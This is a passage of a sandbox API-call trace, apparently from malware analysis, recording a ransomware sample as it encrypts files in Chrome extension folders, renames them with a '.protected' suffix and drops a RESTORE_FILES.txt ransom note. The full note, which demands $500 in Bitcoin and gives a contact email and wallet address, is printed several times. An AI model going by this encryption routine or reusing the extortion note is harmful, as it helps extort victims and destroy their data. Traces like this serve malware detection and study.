pbBuffer=0x295d8cc) returned 1 [0079.434] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.435] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.435] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.435] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.435] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.436] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.436] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.436] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.436] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.436] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.436] CloseHandle (hObject=0x168) returned 1 [0079.436] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.protected") returned 166 [0079.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.protected")) returned 1 [0079.446] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.446] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.446] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\RESTORE_FILES.txt") returned 160 [0079.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.447] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.447] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.447] lstrlenA (lpString="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") returned 684 [0079.447] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.447] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.447] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.448] CloseHandle (hObject=0x164) returned 1 [0079.448] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0079.448] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR") returned 145 [0079.448] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0079.448] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0079.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*") returned 147 [0079.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.448] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.448] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.448] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.448] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.448] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\.") returned 147 [0079.448] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.448] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.448] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.448] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.448] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.448] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.448] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\..") returned 148 [0079.448] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.449] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.449] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.449] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.449] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.449] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.449] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.450] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.450] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0079.450] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.450] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.450] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.450] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.450] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0079.451] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.451] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0079.451] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.452] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.452] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.452] CloseHandle (hObject=0x168) returned 1 [0079.452] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.protected") returned 169 [0079.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0079.453] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.453] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.453] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 163 [0079.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.453] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.453] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.454] lstrlenA (lpString="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") returned 684 [0079.455] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.455] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.455] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.455] CloseHandle (hObject=0x164) returned 1 [0079.455] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0079.455] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT") returned 145 [0079.455] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0079.455] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0079.455] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*") returned 147 [0079.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.456] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.456] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.456] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.456] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.456] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.456] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\.") returned 147 [0079.456] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.456] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.456] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.456] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.456] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.456] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.456] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.456] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\..") returned 148 [0079.456] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.456] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.456] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.456] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.456] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.456] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.456] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.457] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0079.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.457] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.457] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.457] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.458] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.458] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.458] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.458] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, 